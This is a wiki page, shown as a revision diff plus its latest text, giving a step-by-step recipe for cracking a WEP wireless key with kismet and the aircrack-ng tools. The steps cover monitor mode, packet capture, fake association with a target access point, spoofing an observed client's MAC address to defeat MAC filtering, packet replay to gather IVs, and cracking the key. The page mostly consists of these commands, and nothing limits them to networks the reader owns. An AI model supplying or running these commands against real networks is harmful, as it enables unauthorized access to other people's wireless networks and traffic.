Difference between revisions of "Cracking A WEP Key"
Jump to navigation
Jump to search
m |
m |
||
(2 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
− | + | See http://www.aircrack-ng.org/doku.php?id=tutorial | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | *Use kismet to get the channel | + | *Install kismet, kismet-plugins and aircrack-ng packages |
+ | *Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked | ||
These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits | These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits | ||
Line 15: | Line 11: | ||
airmon-ng start wlan0 | airmon-ng start wlan0 | ||
*Start capturing packets: | *Start capturing packets: | ||
− | airodump-ng -w dumpfile - | + | airodump-ng -w dumpfile --channel <channel> mon0 |
− | + | If you don't get enough traffic from the access point on that channel. start a new terminal session: | |
*Associate with the target AP | *Associate with the target AP | ||
− | + | aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0 | |
If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h. | If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h. | ||
*Start replaying packets so that we can collect more packets: | *Start replaying packets so that we can collect more packets: | ||
− | + | aireplay-ng -3 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0 | |
Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers. | Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers. | ||
Line 31: | Line 27: | ||
*Ctrl-C the dump process and crack the key: | *Ctrl-C the dump process and crack the key: | ||
aircrack-ng dumpfile.ivs | aircrack-ng dumpfile.ivs | ||
+ | |||
+ | [[Category:Networking]] |
Latest revision as of 15:37, 31 December 2019
See http://www.aircrack-ng.org/doku.php?id=tutorial
- Install kismet, kismet-plugins and aircrack-ng packages
- Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked
These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits
- Become root:
su -
- Put NIC into monitor mode:
airmon-ng start wlan0
- Start capturing packets:
airodump-ng -w dumpfile --channel <channel> mon0
If you don't get enough traffic from the access point on that channel. start a new terminal session:
- Associate with the target AP
aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0
If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h.
- Start replaying packets so that we can collect more packets:
aireplay-ng -3 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0
Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers.
- Ctrl-C the dump process and crack the key:
aircrack-ng dumpfile.ivs